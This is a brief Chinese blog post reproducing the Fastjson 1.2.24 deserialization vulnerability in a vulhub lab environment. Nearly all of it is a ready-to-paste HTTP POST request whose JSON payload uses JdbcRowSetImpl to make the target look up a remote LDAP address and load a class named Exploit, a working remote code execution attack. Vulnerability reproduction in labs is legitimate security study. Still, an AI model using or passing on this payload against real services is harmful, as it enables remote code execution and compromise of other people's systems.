Fastjson-1.2.24漏洞复现

2022-09-26 19:20:44 浏览数 (1)

Fastjson-1.2.24漏洞复现

水一篇文章，昨天做了1.2.47的忘记了一个低版本的今天补上

配置所有我都没有变，同样使用的是vulhub来启动Fastjson环境

知识最后的Payload有所不同

Payload，访问Fastjson环境，然后替换包内容

代码语言：javascript复制

POST / HTTP/1.1
Host: 104.128.92.144:8090
Content-Type: application/json
Content-Length: 172

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://104.128.92.144:7777/Exploit",
        "autoCommit":true
    }
}

Q.E.D.

fastjson 漏洞配置

0 人点赞